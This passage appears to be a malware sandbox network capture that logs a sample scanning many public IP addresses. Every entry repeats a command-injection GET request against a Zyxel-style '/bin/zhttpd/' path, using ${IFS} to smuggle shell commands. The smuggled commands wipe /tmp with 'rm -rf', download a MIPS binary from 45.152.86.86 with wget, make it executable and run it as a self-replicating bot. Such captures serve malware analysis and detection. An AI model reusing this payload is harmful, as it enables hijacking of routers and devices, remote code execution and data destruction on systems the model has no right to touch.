                              Mar 31, 2024 08:41:41.016988039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6019192.168.2.1342002213.236.212.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017035007 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6020192.168.2.1345150209.233.142.12443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017076969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6021192.168.2.1350510100.175.126.13443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017095089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6022192.168.2.13550301.162.93.52443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017148018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6023192.168.2.133745025.145.33.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017200947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6024192.168.2.135236060.50.38.58443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017221928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6025192.168.2.1332960145.56.194.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017261028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6026192.168.2.1336140131.25.74.148443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017304897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6027192.168.2.133528439.183.99.24443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017364979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6028192.168.2.136019639.57.73.234443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017398119 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6029192.168.2.1357830137.244.102.245443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017431021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6030192.168.2.133485662.19.18.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017476082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6031192.168.2.134228832.194.55.98443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017503023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6032192.168.2.1332854158.145.38.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017556906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6033192.168.2.1358840160.20.18.126443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017600060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6034192.168.2.134010639.162.220.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017632008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6035192.168.2.134433051.241.109.196443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017697096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6036192.168.2.1335682120.56.151.169443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.017726898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6037192.168.2.133911064.35.112.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.021111965 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6038192.168.2.13344361.199.143.197443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.021123886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6039192.168.2.1340014111.195.245.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.021161079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6040192.168.2.135886446.44.6.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.021224022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6041192.168.2.1349806116.204.218.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.021264076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6042192.168.2.1348780102.245.154.246443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.021297932 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6043192.168.2.1351842175.176.178.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.021348000 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6044192.168.2.133944241.68.123.76443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.021384954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6045192.168.2.1354692217.71.111.123443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.021416903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6046192.168.2.135423854.237.221.222443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:41.021467924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6047192.168.2.1334600177.173.165.20443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.009821892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6048192.168.2.1345310122.99.203.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.009866953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6049192.168.2.1347576106.82.143.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.009911060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6050192.168.2.135721869.250.83.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.009938002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6051192.168.2.13481485.197.21.23443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.009989977 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6052192.168.2.133888217.72.24.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010080099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6053192.168.2.133782448.229.147.115443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010108948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6054192.168.2.1345742179.238.31.53443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010145903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6055192.168.2.1340974222.226.91.119443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010190010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6056192.168.2.135411039.129.105.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010231972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6057192.168.2.1349654221.133.154.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010262966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6058192.168.2.1342586145.66.214.85443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010305882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6059192.168.2.135312813.163.14.35443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010325909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6060192.168.2.1342052203.147.219.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010380983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6061192.168.2.1344438186.10.1.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010410070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6062192.168.2.1356816106.150.129.193443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010447979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6063192.168.2.1336200110.36.205.182443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010479927 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6064192.168.2.1360368139.134.120.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010510921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6065192.168.2.133648694.30.123.235443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010575056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6066192.168.2.1333624217.234.54.75443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010605097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6067192.168.2.1352910177.27.61.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010677099 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6068192.168.2.134145082.251.170.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010699987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6069192.168.2.134855420.211.233.100443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010732889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6070192.168.2.134019671.246.220.225443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010787964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6071192.168.2.135673876.45.140.241443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010811090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6072192.168.2.134634831.102.235.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010854006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6073192.168.2.134713838.188.31.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010915041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6074192.168.2.1346578187.13.141.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010941982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6075192.168.2.134134818.93.167.217443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010992050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6076192.168.2.1337392205.238.243.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.010996103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6077192.168.2.135001425.43.40.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.011066914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6078192.168.2.1340110133.112.248.64443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.011105061 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6079192.168.2.1359312129.183.57.90443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:42.011138916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6080192.168.2.134826889.12.194.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044130087 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6081192.168.2.135419660.91.181.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044189930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6082192.168.2.1333450105.191.164.218443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044231892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6083192.168.2.1357064152.238.110.37443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044303894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6084192.168.2.135876472.61.190.255443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044343948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6085192.168.2.134466812.153.131.65443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044397116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6086192.168.2.135953478.74.96.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:43.044429064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6087192.168.2.1348922109.20.156.125443
                              TimestampBytes transferredDirectionData
